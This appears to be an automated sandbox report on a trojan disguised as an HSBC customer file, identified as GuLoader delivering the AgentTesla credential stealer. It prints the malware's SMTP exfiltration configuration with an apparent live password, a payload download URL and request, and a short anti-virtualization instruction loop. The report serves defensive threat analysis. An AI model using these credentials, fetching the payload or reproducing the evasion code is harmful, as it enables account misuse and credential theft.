
Windows Analysis Report HSBC Customer Information.exe

Overview

General Information

Sample Name:HSBC Customer Information.exe
Analysis ID:483511
MD5:448f83467c61e465162daf7cf8d9e88f
SHA1:c627061336905606c2c26b2b460ac4246fd54ca5
SHA256:4773c7c5c52d0163bfa32cb271399692831e00ff7e6877f0877091e111c9f063
Tags:exe

Detection

GuLoader AgentTesla
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Potential malicious icon found
Multi AV Scanner detection for submitted file
Yara detected AgentTesla
GuLoader behavior detected
Yara detected GuLoader
Hides threads from debuggers
Writes to foreign memory regions
Tries to detect Any.run
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Machine Learning detection for sample
Tries to detect virtualization through RDTSC time measurements
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Yara detected Credential Stealer
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to call native functions
Contains long sleeps (>= 3 min)
Abnormal high CPU Usage
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Sample file is different than original file name gathered from version info
PE file contains strange resources
Tries to load missing DLLs
Uses a known web browser user agent for HTTP communication
Checks if the current process is being debugged
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Creates a process in suspended mode (likely to inject code)

Process Tree

  • System is w10x64
  • HSBC Customer Information.exe (PID: 6392 cmdline: 'C:\Users\user\Desktop\HSBC Customer Information.exe' MD5: 448F83467C61E465162DAF7CF8D9E88F)
    • RegAsm.exe (PID: 6140 cmdline: 'C:\Users\user\Desktop\HSBC Customer Information.exe' MD5: 6FD7592411112729BF6B1F2F6C34899F)
      • conhost.exe (PID: 5140 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: Agenttesla

{"Exfil Mode": "SMTP", "SMTP Info": "gmx@qrextechnologies.com2)4#8tVp2d%qmail.qrextechnologies.cominfo@qrextechnologies.com"}

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
00000000.00000002.591786294.0000000002240000.00000040.00000001.sdmp | JoeSecurity_GuLoader_2 | Yara detected GuLoader | Joe Security |
00000019.00000002.738174710.000000001DE91000.00000004.00000001.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security |
00000019.00000002.738174710.000000001DE91000.00000004.00000001.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
Process Memory Space: RegAsm.exe PID: 6140 | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security |
Process Memory Space: RegAsm.exe PID: 6140 | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |

Sigma Overview

No Sigma rule has matched

Jbx Signature Overview

AV Detection:

Found malware configuration
  Source: HSBC Customer Information.exe.6392.0.memstrmin | Malware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "SMTP Info": "gmx@qrextechnologies.com2)4#8tVp2d%qmail.qrextechnologies.cominfo@qrextechnologies.com"}
Multi AV Scanner detection for submitted file
  Source: HSBC Customer Information.exe | Virustotal: Detection: 25%
  Source: HSBC Customer Information.exe | ReversingLabs: Detection: 20%
Machine Learning detection for sample
  Source: HSBC Customer Information.exe | Joe Sandbox ML: detected

  Source: HSBC Customer Information.exe | Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
  Source: unknown | HTTPS traffic detected: 109.71.254.175:443 -> 192.168.2.3:49791 version: TLS 1.2
  Source: Joe Sandbox View | JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
  Source: global traffic | HTTP traffic detected:
    GET /barrr09_HVPbNJre68.bin HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
    Host: qrextechnologies.com
    Cache-Control: no-cache
  Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49791
  Source: unknown | Network traffic detected: HTTP traffic on port 49791 -> 443
  Source: RegAsm.exe, 00000019.00000002.738174710.000000001DE91000.00000004.00000001.sdmp | String found in binary or memory: http://127.0.0.1:HTTP/1.1
  Source: RegAsm.exe, 00000019.00000002.738174710.000000001DE91000.00000004.00000001.sdmp | String found in binary or memory: http://DynDns.comDynDNS
  Source: RegAsm.exe, 00000019.00000002.738174710.000000001DE91000.00000004.00000001.sdmp | String found in binary or memory: http://cthUYD.com
  Source: RegAsm.exe, 00000019.00000002.738174710.000000001DE91000.00000004.00000001.sdmp | String found in binary or memory: https://api.ipify.org%GETMozilla/5.0
  Source: RegAsm.exe, 00000019.00000002.732840831.0000000001200000.00000004.00000001.sdmp | String found in binary or memory: https://qrextechnologies.com/barrr09_HVPbNJre68.bin
  Source: RegAsm.exe, 00000019.00000002.732840831.0000000001200000.00000004.00000001.sdmp | String found in binary or memory: https://qrextechnologies.com/barrr09_HVPbNJre68.binwininet.dllMozilla/5.0
  Source: RegAsm.exe, 00000019.00000002.738174710.000000001DE91000.00000004.00000001.sdmp | String found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha
  Source: unknown | DNS traffic detected: queries for: qrextechnologies.com

System Summary:

Potential malicious icon found
  Source: initial sample | Icon embedded in PE file: bad icon match: 20047c7c70f0e004

  Source: HSBC Customer Information.exe | Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
  Source: C:\Users\user\Desktop\HSBC Customer Information.exe | Code function: 0_2_004017AC
  Source: C:\Users\user\Desktop\HSBC Customer Information.exe | Code function: 0_2_0224282A
  Source: C:\Users\user\Desktop\HSBC Customer Information.exe | Code function: 0_2_022428A3
  Source: C:\Users\user\Desktop\HSBC Customer Information.exe | Code function: 0_2_02245CAF
  Source: C:\Users\user\Desktop\HSBC Customer Information.exe | Code function: 0_2_022406C3
  Source: C:\Users\user\Desktop\HSBC Customer Information.exe | Code function: 0_2_02240ED2
  Source: C:\Users\user\Desktop\HSBC Customer Information.exe | Code function: 0_2_02240F34
  Source: C:\Users\user\Desktop\HSBC Customer Information.exe | Code function: 0_2_02240702
  Source: C:\Users\user\Desktop\HSBC Customer Information.exe | Code function: 0_2_0224651E
  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 25_2_1DD747A0
  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 25_2_1DD74790
  Source: C:\Users\user\Desktop\HSBC Customer Information.exe | Code function: 0_2_02245CAF NtAllocateVirtualMemory
  Source: C:\Users\user\Desktop\HSBC Customer Information.exe | Process Stats: CPU usage > 98%
  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Process Stats: CPU usage > 98%
  Source: HSBC Customer Information.exe, 00000000.00000000.208413125.000000000041D000.00000002.00020000.sdmp | Binary or memory string: OriginalFilename Blankningscu5.exe vs HSBC Customer Information.exe
  Source: HSBC Customer Information.exe | Binary or memory string: OriginalFilename Blankningscu5.exe vs HSBC Customer Information.exe
  Source: HSBC Customer Information.exe | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: sfc.dll
  Source: HSBC Customer Information.exe | Virustotal: Detection: 25%
  Source: HSBC Customer Information.exe | ReversingLabs: Detection: 20%
  Source: HSBC Customer Information.exe | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
  Source: C:\Users\user\Desktop\HSBC Customer Information.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
  Source: C:\Users\user\Desktop\HSBC Customer Information.exe | Section loaded: C:\Windows\SysWOW64\msvbvm60.dll
  Source: unknown | Process created: C:\Users\user\Desktop\HSBC Customer Information.exe 'C:\Users\user\Desktop\HSBC Customer Information.exe'
  Source: C:\Users\user\Desktop\HSBC Customer Information.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe 'C:\Users\user\Desktop\HSBC Customer Information.exe'
  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32
  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
  Source: classification engine | Classification label: mal100.rans.troj.evad.winEXE@4/0@1/1
  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
  Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5140:120:WilError_01
  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File read: C:\Windows\System32\drivers\etc\hosts
  Source: Window Recorder | Window detected: More than 3 window changes detected

Data Obfuscation:

Yara detected GuLoader
  Source: Yara match | File source: 00000000.00000002.591786294.0000000002240000.00000040.00000001.sdmp, type: MEMORY

  Source: C:\Users\user\Desktop\HSBC Customer Information.exe | Code function: 0_2_00407D36 push 0000000Fh; ret 0_2_00407D56
  Source: C:\Users\user\Desktop\HSBC Customer Information.exe | Code function: 0_2_004059AE push ecx; ret 0_2_004059AF
  Source: C:\Users\user\Desktop\HSBC Customer Information.exe | Code function: 0_2_02241E3C push esp; ret 0_2_02241E9D
  Source: C:\Users\user\Desktop\HSBC Customer Information.exe | Code function: 0_2_0224460E push ebp; iretd 0_2_022446A9
  Source: C:\Users\user\Desktop\HSBC Customer Information.exe | Code function: 0_2_02244412 push esp; retf 0_2_02244413
  Source: C:\Users\user\Desktop\HSBC Customer Information.exe | Code function: 0_2_0224301F push ebx; iretd 0_2_02243026
  Source: C:\Users\user\Desktop\HSBC Customer Information.exe | Code function: 0_2_02240A5C push esi; retf 0_2_02240A5D
  Source: C:\Users\user\Desktop\HSBC Customer Information.exe | Code function: 0_2_022446B5 push ebp; iretd 0_2_022446A9
  Source: C:\Users\user\Desktop\HSBC Customer Information.exe | Code function: 0_2_02242D18 push ebx; iretd 0_2_02242D52
  Source: C:\Users\user\Desktop\HSBC Customer Information.exe | Code function: 0_2_02246B6D push ecx; retf 0_2_02246B6E
  Source: C:\Users\user\Desktop\HSBC Customer Information.exe | Code function: 0_2_022441BE push ebx; iretd 0_2_0224435E
  Source: C:\Users\user\Desktop\HSBC Customer Information.exe | Code function: 0_2_02241F89 push 0000001Dh; ret 0_2_02241F8B
  Source: C:\Users\user\Desktop\HSBC Customer Information.exe | Code function: 0_2_02244192 push ebx; iretd 0_2_0224435E
  Source: C:\Users\user\Desktop\HSBC Customer Information.exe | Code function: 0_2_022467E2 pushad ; retf 0_2_022467F1
  Source: C:\Users\user\Desktop\HSBC Customer Information.exe | Code function: 0_2_022445F1 push ebp; iretd 0_2_022446A9
  Source: C:\Users\user\Desktop\HSBC Customer Information.exe | Process information set: NOOPENFILEERRORBOX
  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Process information set: NOOPENFILEERRORBOX
  Source: C:\Windows\System32\conhost.exe | Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Tries to detect Any.run
  Source: C:\Users\user\Desktop\HSBC Customer Information.exe | File opened: C:\Program Files\Qemu-ga\qemu-ga.exe
  Source: C:\Users\user\Desktop\HSBC Customer Information.exe | File opened: C:\Program Files\qga\qga.exe
  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Program Files\Qemu-ga\qemu-ga.exe
  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Program Files\qga\qga.exe
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
  Source: RegAsm.exe, 00000019.00000002.732840831.0000000001200000.00000004.00000001.sdmp | Binary or memory string: NTDLLKERNEL32USER32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERSHELL32ADVAPI32USERPROFILE=HTTPS://QREXTECHNOLOGIES.COM/BARRR09_HVPBNJRE68.BINWININET.DLLMOZILLA/5.0 (WINDOWS NT 6.1; WOW64; TRIDENT/7.0; RV:11.0) LIKE GECKO
  Source: HSBC Customer Information.exe, 00000000.00000002.591846638.0000000002360000.00000004.00000001.sdmp, RegAsm.exe, 00000019.00000002.732840831.0000000001200000.00000004.00000001.sdmp | Binary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
  Source: HSBC Customer Information.exe, 00000000.00000002.591846638.0000000002360000.00000004.00000001.sdmp | Binary or memory string: NTDLLKERNEL32USER32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERSHELL32ADVAPI32USERPROFILE=WINDIR=\MICROSOFT.NET\FRAMEWORK\V4.0.30319\REGASM.EXE\SYSWOW64\MSVBVM60.DLL
Tries to detect virtualization through RDTSC time measurements
  Source: C:\Users\user\Desktop\HSBC Customer Information.exe | RDTSC instruction interceptor: First address: 000000000040BC41 second address: 000000000040BC41 instructions:
    0x00000000 rdtsc
    0x00000002 cmp edx, 000000F3h
    0x00000008 xor eax, edx
    0x0000000a cmp cx, 00E8h
    0x0000000f dec edi
    0x00000010 cmp bx, 00DDh
    0x00000015 fabs
    0x00000017 jmp 00007FC36C4BB470h
    0x00000019 cmp edi, 00000000h
    0x0000001c jne 00007FC36C4BB393h
    0x00000022 cmp si, 00BBh
    0x00000027 mov ebx, F06F76B6h
    0x0000002c cmp dh, FFFFFFACh
    0x0000002f sub ebx, 2716C148h
    0x00000035 cmp ebx, 24h
    0x00000038 xor ebx, 6F5BB001h
    0x0000003e cmp di, 0030h
    0x00000042 punpckldq mm1, mm7
    0x00000045 jmp 00007FC36C4BB474h
    0x00000047 xor ebx, A643056Fh
    0x0000004d cmp ah, 00000026h
    0x00000050 cmp cl, FFFFFF90h
    0x00000053 rdtsc
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard

  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 4332 | Thread sleep time: -26747778906878833s >= -30000s
  Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Thread delayed: delay time: 922337203685477
  Source: C:\Users\user\Desktop\HSBC Customer Information.exe | Window / User API: threadDelayed 684
  Source: C:\Users\user\Desktop\HSBC Customer Information.exe | Window / User API: threadDelayed 9316
  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Window / User API: threadDelayed 9139
  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Window / User API: threadDelayed 685
  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Process information queried: ProcessInformation
  Source: C:\Users\user\Desktop\HSBC Customer Information.exe | System information queried: ModuleInformation
  Source: RegAsm.exe, 00000019.00000002.732840831.0000000001200000.00000004.00000001.sdmp | Binary or memory string: ntdllkernel32user32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublishershell32advapi32USERPROFILE=https://qrextechnologies.com/barrr09_HVPbNJre68.binwininet.dllMozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
  Source: HSBC Customer Information.exe, 00000000.00000002.591846638.0000000002360000.00000004.00000001.sdmp | Binary or memory string: ntdllkernel32user32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublishershell32advapi32USERPROFILE=windir=\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe\syswow64\msvbvm60.dll
  Source: HSBC Customer Information.exe, 00000000.00000002.591846638.0000000002360000.00000004.00000001.sdmp, RegAsm.exe, 00000019.00000002.732840831.0000000001200000.00000004.00000001.sdmp | Binary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe

Anti Debugging:

Hides threads from debuggers
  Source: C:\Users\user\Desktop\HSBC Customer Information.exe | Thread information set: HideFromDebugger
  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Thread information set: HideFromDebugger

  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Process token adjusted: Debug
  Source: C:\Users\user\Desktop\HSBC Customer Information.exe | Process queried: DebugPort
  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Process queried: DebugPort
  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Memory allocated: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion:

Writes to foreign memory regions
  Source: C:\Users\user\Desktop\HSBC Customer Information.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 1000000

  Source: C:\Users\user\Desktop\HSBC Customer Information.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe 'C:\Users\user\Desktop\HSBC Customer Information.exe'
  Source: RegAsm.exe, 00000019.00000002.734685005.00000000017B0000.00000002.00020000.sdmp | Binary or memory string: Program Manager
  Source: RegAsm.exe, 00000019.00000002.734685005.00000000017B0000.00000002.00020000.sdmp | Binary or memory string: Shell_TrayWnd
  Source: RegAsm.exe, 00000019.00000002.734685005.00000000017B0000.00000002.00020000.sdmp | Binary or memory string: Progman
  Source: RegAsm.exe, 00000019.00000002.734685005.00000000017B0000.00000002.00020000.sdmp | Binary or memory string: Progmanlock
  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe VolumeInformation
  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information:

Yara detected AgentTesla
  Source: Yara match | File source: 00000019.00000002.738174710.000000001DE91000.00000004.00000001.sdmp, type: MEMORY
  Source: Yara match | File source: Process Memory Space: RegAsm.exe PID: 6140, type: MEMORYSTR
GuLoader behavior detected
  Source: Initial file | Signature Results: GuLoader behavior

  Source: Yara match | File source: 00000019.00000002.738174710.000000001DE91000.00000004.00000001.sdmp, type: MEMORY
  Source: Yara match | File source: Process Memory Space: RegAsm.exe PID: 6140, type: MEMORYSTR

Remote Access Functionality:

Yara detected AgentTesla
  Source: Yara match | File source: 00000019.00000002.738174710.000000001DE91000.00000004.00000001.sdmp, type: MEMORY
  Source: Yara match | File source: Process Memory Space: RegAsm.exe PID: 6140, type: MEMORYSTR

Mitre Att&ck Matrix

(Digits following a technique name are the report's superscript hit-count markers, kept as extracted.)

Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
Valid Accounts | Windows Management Instrumentation 211 | DLL Side-Loading 1 | Process Injection 112 | Disable or Modify Tools 1 | OS Credential Dumping | Security Software Discovery 521 | Remote Services | Archive Collected Data 1 | Exfiltration Over Other Network Medium | Encrypted Channel 11 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | DLL Side-Loading 1 | Virtualization/Sandbox Evasion 341 | LSASS Memory | Process Discovery 2 | Remote Desktop Protocol | Data from Removable Media | Exfiltration Over Bluetooth | Ingress Tool Transfer 1 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | Process Injection 112 | Security Account Manager | Virtualization/Sandbox Evasion 341 | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Non-Application Layer Protocol 2 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Obfuscated Files or Information 1 | NTDS | Application Window Discovery 1 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Application Layer Protocol 13 | SIM Card Swap | | Carrier Billing Fraud
Cloud Accounts | Cron | Network Logon Script | Network Logon Script | DLL Side-Loading 1 | LSA Secrets | Remote System Discovery 1 | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings
Replication Through Removable Media | Launchd | Rc.common | Rc.common | Steganography | Cached Domain Credentials | System Information Discovery 214 | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | | Abuse Accessibility Features

            Behavior Graph


            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            Source | Detection | Scanner | Label
            HSBC Customer Information.exe | 25% | Virustotal |
            HSBC Customer Information.exe | 20% | ReversingLabs | Win32.Trojan.Mucc
            HSBC Customer Information.exe | 100% | Joe Sandbox ML |

            Dropped Files

            No Antivirus matches

            Unpacked PE Files

            No Antivirus matches

            Domains

            No Antivirus matches

            URLs

            Source | Detection | Scanner | Label
            http://127.0.0.1:HTTP/1.1 | 0% | Avira URL Cloud | safe
            https://api.ipify.org%GETMozilla/5.0 | 0% | URL Reputation | safe
            http://DynDns.comDynDNS | 0% | URL Reputation | safe
            https://qrextechnologies.com/barrr09_HVPbNJre68.bin | 0% | Avira URL Cloud | safe
            https://qrextechnologies.com/barrr09_HVPbNJre68.binwininet.dllMozilla/5.0 | 0% | Avira URL Cloud | safe
            https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha | 0% | URL Reputation | safe
            http://cthUYD.com | 0% | Avira URL Cloud | safe

            Domains and IPs

            Contacted Domains

            Name | IP | Active | Malicious | Antivirus Detection | Reputation
            qrextechnologies.com | 109.71.254.175 | true | true | | unknown

              Contacted URLs

              Name | Malicious | Antivirus Detection | Reputation
              https://qrextechnologies.com/barrr09_HVPbNJre68.bin | false | Avira URL Cloud: safe | unknown

              URLs from Memory and Binaries

              Name | Source | Malicious | Antivirus Detection | Reputation
              http://127.0.0.1:HTTP/1.1 | RegAsm.exe, 00000019.00000002.738174710.000000001DE91000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | low
              https://api.ipify.org%GETMozilla/5.0 | RegAsm.exe, 00000019.00000002.738174710.000000001DE91000.00000004.00000001.sdmp | false | URL Reputation: safe | low
              http://DynDns.comDynDNS | RegAsm.exe, 00000019.00000002.738174710.000000001DE91000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
              https://qrextechnologies.com/barrr09_HVPbNJre68.binwininet.dllMozilla/5.0 | RegAsm.exe, 00000019.00000002.732840831.0000000001200000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
              https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha | RegAsm.exe, 00000019.00000002.738174710.000000001DE91000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
              http://cthUYD.com | RegAsm.exe, 00000019.00000002.738174710.000000001DE91000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown

              Contacted IPs


              Public

              IP | Domain | Country | ASN | ASN Name | Malicious
              109.71.254.175 | qrextechnologies.com | Germany | 207778 | LINSERVERSNL | true

              General Information

              Joe Sandbox Version: 33.0.0 White Diamond
              Analysis ID: 483511
              Start date: 15.09.2021
              Start time: 07:10:14
              Joe Sandbox Product: CloudBasic
              Overall analysis duration: 0h 7m 13s
              Hypervisor based Inspection enabled: false
              Report type: full
              Sample file name: HSBC Customer Information.exe
              Cookbook file name: default.jbs
              Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
              Number of analysed new started processes: 36
              Number of new started drivers analysed: 0
              Number of existing processes analysed: 0
              Number of existing drivers analysed: 0
              Number of injected processes analysed: 0
              Technologies:
              • HCA enabled
              • EGA enabled
              • HDC enabled
              • AMSI enabled
              Analysis Mode: default
              Analysis stop reason: Timeout
              Detection: MAL
              Classification: mal100.rans.troj.evad.winEXE@4/0@1/1
              EGA Information: Failed
              HDC Information:
              • Successful, ratio: 54.6% (good quality ratio 30.8%)
              • Quality average: 31.7%
              • Quality standard deviation: 33.8%
              HCA Information:
              • Successful, ratio: 88%
              • Number of executed functions: 13
              • Number of non-executed functions: 12
              Cookbook Comments:
              • Adjust boot time
              • Enable AMSI
              • Found application associated with file extension: .exe
              • Override analysis time to 240s for sample files taking high CPU consumption
              Warnings:
              • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, WmiPrvSE.exe, svchost.exe, UsoClient.exe, wuapihost.exe
              • Excluded IPs from analysis (whitelisted): 92.122.145.220, 23.35.236.56, 20.82.210.154, 40.112.88.60, 23.216.77.208, 23.216.77.209, 20.82.209.183, 20.54.110.249
              • Excluded domains from analysis (whitelisted): iris-de-prod-azsc-neu.northeurope.cloudapp.azure.com, fs.microsoft.com, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, ris-prod.trafficmanager.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, asf-ris-prod-neu.northeurope.cloudapp.azure.com, store-images.s-microsoft.com-c.edgekey.net, e1723.g.akamaiedge.net, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, ris.api.iris.microsoft.com, e12564.dspb.akamaiedge.net, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, store-images.s-microsoft.com, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net
              • Not all processes were analyzed; the report is missing behavior information
              • Report size getting too big, too many NtAllocateVirtualMemory calls found.
              • Report size getting too big, too many NtOpenKeyEx calls found.
              • Report size getting too big, too many NtProtectVirtualMemory calls found.
              • Report size getting too big, too many NtQueryValueKey calls found.

              Simulations

              Behavior and APIs

              Time | Type | Description
              07:14:51 | API Interceptor | 149x Sleep call for process: RegAsm.exe modified

              Joe Sandbox View / Context

              IPs

              No context

              Domains

              No context

              ASN

              No context

              JA3 Fingerprints

